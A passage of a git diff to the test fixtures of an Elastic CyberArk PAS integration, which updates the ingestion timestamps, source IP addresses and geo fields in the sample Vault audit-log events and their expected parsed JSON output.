\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Create File Version", "message": "Create File Version", "issuer": "PSMPApp_SSH", @@ -538,8 +470,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502267700Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:27\",\"IsoTimestamp\":\"2021-03-14T12:57:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726796100Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:27\",\"IsoTimestamp\":\"2021-03-14T12:57:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log index 82be0d698c1..642ca7704b6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log @@ -5,8 +5,8 @@ <5>1 2021-03-04T19:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 04 11:11:23","IsoTimestamp":"2021-03-04T19:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-05T10:18:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 05 02:18:50","IsoTimestamp":"2021-03-05T10:18:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json index a2df4596360..7bace2e2b98 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675175400Z", + "ingested": "2021-12-09T13:37:10.420964800Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e7\u003c/MessageID\u003e\\n \u003cDesc\u003eLogon\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eLogon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogon\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.2.0.3\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\"}}}", "code": "7", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675184400Z", + "ingested": "2021-12-09T13:37:10.420973400Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675186400Z", + "ingested": "2021-12-09T13:37:10.420978900Z", "original": "\u003c5\u003e1 2021-03-04T19:10:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:20\",\"IsoTimestamp\":\"2021-03-04T19:10:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"SCIM-user\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -250,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675187800Z", + "ingested": "2021-12-09T13:37:10.420984300Z", "original": "\u003c5\u003e1 2021-03-04T19:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:20\",\"IsoTimestamp\":\"2021-03-04T19:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -317,7 +317,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675189100Z", + "ingested": "2021-12-09T13:37:10.420989600Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -384,7 +384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675190400Z", + "ingested": "2021-12-09T13:37:10.420995100Z", "original": "\u003c5\u003e1 2021-03-05T10:18:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 02:18:50\",\"IsoTimestamp\":\"2021-03-05T10:18:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -460,7 +460,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675191700Z", + "ingested": "2021-12-09T13:37:10.421000500Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", @@ -489,20 +489,8 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -525,7 +513,7 @@ "Administrator" ], "ip": [ - "81.32.170.205", + "67.43.156.13", "10.0.1.20" ] }, @@ -535,7 +523,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-09T08:32:51Z", "gateway_station": "10.0.1.20", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "Administrator", @@ -548,8 +536,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675192900Z", - "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:37:10.421003800Z", + "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", "action": "authentication_success", @@ -577,20 +565,8 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "37.223.7.45", - "ip": "37.223.7.45" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -613,7 +589,7 @@ "Administrator" ], "ip": [ - "37.223.7.45", + "67.43.156.13", "10.0.1.20" ] }, @@ -623,7 +599,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-09T10:14:58Z", "gateway_station": "10.0.1.20", - "station": "37.223.7.45", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "Administrator", @@ -636,8 +612,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675194300Z", - "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 